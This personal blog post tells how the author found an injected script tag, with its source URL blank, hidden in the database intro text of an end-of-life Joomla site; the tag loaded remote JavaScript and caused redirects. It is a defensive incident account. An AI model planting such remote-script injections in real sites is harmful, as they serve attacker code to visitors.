Friday, February 8, 2013

Joomla injection attack counter js

I 'manage' in the loosest sense a website for a friend. I inherited it years ago, and only host it. I originally moved the system and left it at that.

I advised them then that the Joomla 1.0.x version was going EOL at the time and they needed to update or face getting hacked.

Tonight the inevitable happened, despite repeated warnings.

I Googled for this and found very little information so went for a dig about.

The first part was locating the problem as the page redirects and it was hard to catch a page of source, but eventually I got it.

I thought it might be a hacked js file. But on the page was the following link :

script type='text/javascript' src=''

So it was loading the javascript from the remote (bastards) server.

I had a look at a few pages, and then at the HTML and saw nothing. So I then had a peer in the MySQL database.

In the intro text, the line of code had been inserted prior to the standard HTML, and as it was a script, the editor never saw it.

The tricky part will be removing it from the tables, but as I have taken the site offline and told them it will not get back online until it is sorted, the easiest route will probably be to export the database and sed the data out.

Anyway, thought for the day is 'when shit goes EOL, change it'


No comments:

Post a Comment